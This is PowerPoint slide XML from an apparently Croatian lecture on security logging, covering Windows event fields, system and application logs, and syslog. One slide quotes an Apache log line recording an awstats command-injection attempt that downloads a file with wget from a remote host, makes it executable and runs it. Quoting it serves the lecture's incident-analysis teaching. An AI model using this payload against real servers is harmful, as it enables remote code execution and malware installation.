            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> Name: SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: NT AUTHORITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Primary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Logon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> ID: (0x0,0x3F7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>userk</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t>: KENT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Logon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1600" i="1" dirty="0"/>
              <a:t> ID: (0x0,0x28BFD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" i="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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Sistemski zapisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Zapisuju događaje sustava vezane uz općenitu funkcionalnost sustava</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" dirty="0"/>
              <a:t>Npr. informacije o pokretanju sustava, instalaciji programa i zakrpi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" dirty="0"/>
              <a:t>Često pomažu prilikom analize incidenta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" dirty="0"/>
              <a:t>Otkrivanje uzroka problema u radu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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Aplikacijski log zapisi (audit/sistemski)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43010" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Praktički nema standarda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>posebice za „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>made</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>” aplikacije,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>shelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>” standardizirani</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Vrlo često se moraju dodatno procesirati </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Standardne aplikacije nisu problematične</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primjer Apache:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.30.128.27 - - [14/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2005:05:41:18 -0500] "GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awstats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awstats.pl?config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e214%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 302 494</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="26262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0EAC488-F1FF-4982-9F00-5A2D74A217F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Za razmišljanje</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rezervirano mjesto sadržaja 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AF1A95-BC42-4217-9149-6BD54912027F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Je li korisno analizirati sve podatke koje imate u organizaciji?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> Naravno, iz perspektive sigurnosti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Koje izvore podataka morate obavezno analizirati u svakoj organizaciji?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Računala, poslužitelji</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Mrežne aktivnosti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Vatrozid</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Imenički servis (Active Directory, Azure AD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Surfanje (Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, CASB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275407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zervirano mjesto sadržaja 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ECCA62-1600-44D0-896C-667F8FA83214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="548680"/>
            <a:ext cx="7191128" cy="5160810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Slika 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA37F34-0878-41B5-A93D-B31181CD53F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5993468"/>
            <a:ext cx="8298096" cy="864532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37341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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44034" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jedan od najstarijih formata za slanje log zapisa preko IP mreža</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Klijentsko-poslužiteljski protokol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Razvio još 80-tih godina Eric Allman (autor Sendmaila)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Definiran RFC 3164 dokumentom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Klijent (eng. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" i="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Originator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Poslužitelj (eng. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" i="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prijenosni poslužitelj (eng. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" i="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44036" name="Picture 2" descr="sys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3744913"/>
            <a:ext cx="3057525"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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> koristi određeni format poruka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Vrsta log zapisa (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
